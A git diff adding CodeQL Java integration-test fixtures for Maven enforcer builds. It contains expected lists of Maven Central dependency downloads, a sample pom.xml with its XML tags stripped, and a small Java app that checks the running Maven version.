https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/1.3.1/plexus-components-1.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/4.0/plexus-components-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-components/6.6/plexus-components-6.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9-stable-1/plexus-container-default-1.0-alpha-9-stable-1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-container-default/1.0-alpha-9/plexus-container-default-1.0-alpha-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.0.3/plexus-containers-1.0.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.5.4/plexus-containers-1.5.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.6/plexus-containers-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/1.7.1/plexus-containers-1.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.0.0/plexus-containers-2.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-containers/2.1.0/plexus-containers-2.1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-i18n/1.0-beta-10/plexus-i18n-1.0-beta-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interactivity-api/1.0-alpha-4/plexus-interactivity-api-1.0-alpha-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.11/plexus-interpolation-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.14/plexus-interpolation-1.14.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.22/plexus-interpolation-1.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.24/plexus-interpolation-1.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-interpolation/1.26/plexus-interpolation-1.26.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/2.7.1/plexus-io-2.7.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-io/3.4.2/plexus-io-3.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-java/0.9.10/plexus-java-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-languages/0.9.10/plexus-languages-0.9.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-resources/1.2.0/plexus-resources-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.0.4/plexus-utils-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.4.1/plexus-utils-1.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.15/plexus-utils-1.5.15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.5/plexus-utils-1.5.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.6/plexus-utils-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/1.5.8/plexus-utils-1.5.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.4/plexus-utils-2.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/2.0.5/plexus-utils-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.22/plexus-utils-3.0.22.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.0.24/plexus-utils-3.0.24.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/3.4.1/plexus-utils-3.4.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-utils/4.0.1/plexus-utils-4.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-velocity/1.2/plexus-velocity-1.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus-xml/3.0.0/plexus-xml-3.0.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.10/plexus-1.0.10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.11/plexus-1.0.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.12/plexus-1.0.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/1.0.4/plexus-1.0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/13/plexus-13.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/16/plexus-16.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/17/plexus-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.2/plexus-2.0.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.5/plexus-2.0.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.6/plexus-2.0.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/2.0.7/plexus-2.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.2/plexus-3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.1/plexus-3.3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/3.3.2/plexus-3.3.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/4.0/plexus-4.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/5.1/plexus-5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/codehaus/plexus/plexus/8/plexus-8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit-parent/5.13.0.202109080827-r/org.eclipse.jgit-parent-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/eclipse/jgit/org.eclipse.jgit/5.13.0.202109080827-r/org.eclipse.jgit-5.13.0.202109080827-r.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-core/1.3/hamcrest-core-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/hamcrest/hamcrest-parent/1.3/hamcrest-parent-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/iq80/snappy/snappy/0.4/snappy-0.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.0/junit-bom-5.10.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.1/junit-bom-5.10.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.10.2/junit-bom-5.10.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.7.2/junit-bom-5.7.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/junit/junit-bom/5.9.3/junit-bom-5.9.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/6.2/asm-6.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/asm/asm/9.7/asm-9.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5.1/ow2-1.5.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/ow2/ow2/1.5/ow2-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/jcl-over-slf4j/1.5.6/jcl-over-slf4j-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.5.6/slf4j-api-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.30/slf4j-api-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.32/slf4j-api-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.36/slf4j-api-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-api/1.7.5/slf4j-api-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-jdk14/1.5.6/slf4j-jdk14-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.5.6/slf4j-parent-1.5.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.30/slf4j-parent-1.7.30.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.32/slf4j-parent-1.7.32.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.36/slf4j-parent-1.7.36.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/slf4j/slf4j-parent/1.7.5/slf4j-parent-1.7.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-api/1.7/aether-api-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-impl/1.7/aether-impl-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-parent/1.7/aether-parent-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-spi/1.7/aether-spi-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/aether/aether-util/1.7/aether-util-1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/10/forge-parent-10.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/4/forge-parent-4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/5/forge-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/forge/forge-parent/6/forge-parent-6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/5/oss-parent-5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/7/oss-parent-7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/oss/oss-parent/9/oss-parent-9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-build-api/0.0.7/plexus-build-api-0.0.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-cipher/1.4/plexus-cipher-1.4.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/plexus/plexus-sec-dispatcher/1.3/plexus-sec-dispatcher-1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-bean/1.4.2/guice-bean-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/inject/guice-plexus/1.4.2/guice-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7-noaop.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-guice/2.1.7/sisu-guice-2.1.7.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-bean/1.4.2/sisu-inject-bean-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject-plexus/1.4.2/sisu-inject-plexus-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-inject/1.4.2/sisu-inject-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/sisu/sisu-parent/1.4.2/sisu-parent-1.4.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/12/spice-parent-12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/15/spice-parent-15.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/sonatype/spice/spice-parent/17/spice-parent-17.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.5/xz-1.5.pom +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/org/tukaani/xz/1.9/xz-1.9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/oro/oro/2.0.8/oro-2.0.8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/xml-apis/xml-apis/1.0.b2/xml-apis-1.0.b2.pom diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/pom.xml b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/pom.xml new file mode 100644 index 000000000000..becb322222ec --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/pom.xml @@ -0,0 +1,133 @@ + + + + 4.0.0 + + com.example + maven-sample + 1.0-SNAPSHOT + + maven-sample + + http://www.example.com + + + UTF-8 + 1.7 + 1.7 + + + + + junit + junit + 4.11 + test + + + + + + + exec-maven-plugin + org.codehaus.mojo + 1.1.1 + + + check-maven-version + package + + java + + + + + com.example.App + + + + com.diffplug.spotless + spotless-maven-plugin + 2.19.1 + + + + check + + compile + + + + + + /* FAIL ME */ + + + + + + org.apache.maven.plugins + maven-enforcer-plugin + + + enforce-maven + + enforce + + + + + (,3.8.2],[3.8.5,) + + + + + + + + + + + + + maven-clean-plugin + 3.1.0 + + + + maven-resources-plugin + 3.0.2 + + + maven-compiler-plugin + 3.8.0 + + + maven-surefire-plugin + 2.22.1 + + + maven-jar-plugin + 3.0.2 + + + maven-install-plugin + 2.5.2 + + + maven-deploy-plugin + 2.8.2 + + + + maven-site-plugin + 3.7.1 + + + maven-project-info-reports-plugin + 3.0.0 + + + + + diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/source_archive.expected b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/source_archive.expected new file mode 100644 index 000000000000..59a81a01481c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/source_archive.expected @@ -0,0 +1,10 @@ +pom.xml +src/main/java/com/example/App.java +src/main/resources/my-app.properties +src/main/resources/page.xml +src/main/resources/struts.xml +src/test/java/com/example/AppTest.java +target/classes/my-app.properties +target/classes/page.xml +target/classes/struts.xml +target/maven-archiver/pom.properties diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/java/com/example/App.java b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/java/com/example/App.java new file mode 100644 index 000000000000..c9eec918587c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/java/com/example/App.java @@ -0,0 +1,30 @@ +package com.example; + +import java.util.regex.Pattern; +import java.nio.file.Path; +import java.nio.file.Paths; + +/** + * Hello world! + * + */ +public class App +{ + public static void main( String[] args ) + { + System.out.println( "Hello World!" ); + String expectedVersion = System.getenv("EXPECT_MAVEN"); + Path mavenHome = Paths.get(System.getProperty("maven.home")).normalize(); + String observedVersion = mavenHome.getFileName().toString(); + if (expectedVersion != null && !expectedVersion.equals(observedVersion)) { + System.err.println("Wrong maven version, expected '" + expectedVersion + "' but got '" + observedVersion + "'" + mavenHome); + System.exit(1); + } + String commandMatcher = System.getenv("EXPECT_COMMAND_REGEX"); + String command = System.getProperty("sun.java.command"); + if (commandMatcher != null && !Pattern.matches(commandMatcher, command)) { + System.err.println("Wrong command line, '" + command + "' does not match '" + commandMatcher + "'"); + System.exit(1); + } + } +} diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/my-app.properties b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/my-app.properties new file mode 100644 index 000000000000..e566b49a29a8 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/my-app.properties @@ -0,0 +1 @@ +version=1.0 diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/page.xml b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/page.xml new file mode 100644 index 000000000000..2bab459cb031 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/page.xml @@ -0,0 +1,8 @@ + + +A sample + + +

    Hello world!

    + + diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/struts.xml b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/struts.xml new file mode 100644 index 000000000000..73fc0c6b9cb6 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/main/resources/struts.xml @@ -0,0 +1,4 @@ + + +This is a sample file + diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/test/java/com/example/AppTest.java b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/test/java/com/example/AppTest.java new file mode 100644 index 000000000000..22a94ca6f01c --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/src/test/java/com/example/AppTest.java @@ -0,0 +1,20 @@ +package com.example; + +import static org.junit.Assert.assertTrue; + +import org.junit.Test; + +/** + * Unit test for simple App. + */ +public class AppTest +{ + /** + * Rigorous Test :-) + */ + @Test + public void shouldAnswerWithTrue() + { + assertTrue( true ); + } +} diff --git a/java/ql/integration-tests/java/maven-enforcer-multiple-versions/test.py b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/test.py new file mode 100644 index 000000000000..eb49efe6a2a3 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-multiple-versions/test.py @@ -0,0 +1,2 @@ +def test(codeql, java): + codeql.database.create() diff --git a/java/ql/integration-tests/java/maven-enforcer-single-version/maven-fetches.expected b/java/ql/integration-tests/java/maven-enforcer-single-version/maven-fetches.expected new file mode 100644 index 000000000000..84ebefb5d442 --- /dev/null +++ b/java/ql/integration-tests/java/maven-enforcer-single-version/maven-fetches.expected @@ -0,0 +1,542 @@ +Downloaded from central: https://repo.maven.apache.org/maven2/avalon-framework/avalon-framework/4.1.3/avalon-framework-4.1.3.pom +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/backport-util-concurrent/backport-util-concurrent/3.1/backport-util-concurrent-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1-alpha-2/classworlds-1.1-alpha-2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/classworlds/classworlds/1.1/classworlds-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-collect/1.2.0/durian-collect-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/durian/durian-core/1.2.0/durian-core-1.2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib-extra/2.21.2/spotless-lib-extra-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-lib/2.21.2/spotless-lib-2.21.2.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/diffplug/spotless/spotless-maven-plugin/2.19.1/spotless-maven-plugin-2.19.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/github/luben/zstd-jni/1.5.5-11/zstd-jni-1.5.5-11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/google/code/findbugs/jsr305/2.0.1/jsr305-2.0.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/concurrent-trees/concurrent-trees/2.6.1/concurrent-trees-2.6.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/googlecode/javaewah/JavaEWAH/1.1.12/JavaEWAH-1.1.12.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M8/qdox-2.0-M8.pom +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.jar +Downloaded from central: https://repo.maven.apache.org/maven2/com/thoughtworks/qdox/qdox/2.0-M9/qdox-2.0-M9.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.6/commons-beanutils-1.6.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-beanutils/commons-beanutils/1.7.0/commons-beanutils-1.7.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-chain/commons-chain/1.1/commons-chain-1.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-cli/commons-cli/1.0/commons-cli-1.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.11/commons-codec-1.11.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.16.1/commons-codec-1.16.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.jar +Downloaded from central: https://repo.maven.apache.org/maven2/commons-codec/commons-codec/1.17.0/commons-codec-1.17.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.0/commons-collections-2.0.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/2.1/commons-collections-2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.1/commons-collections-3.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.pom +Downloaded from central: https://repo.maven.apache.org/maven2/commons-collections/commons-collections/3.2.2/commons-collections-3.2.2.jar +Downloaded from central: 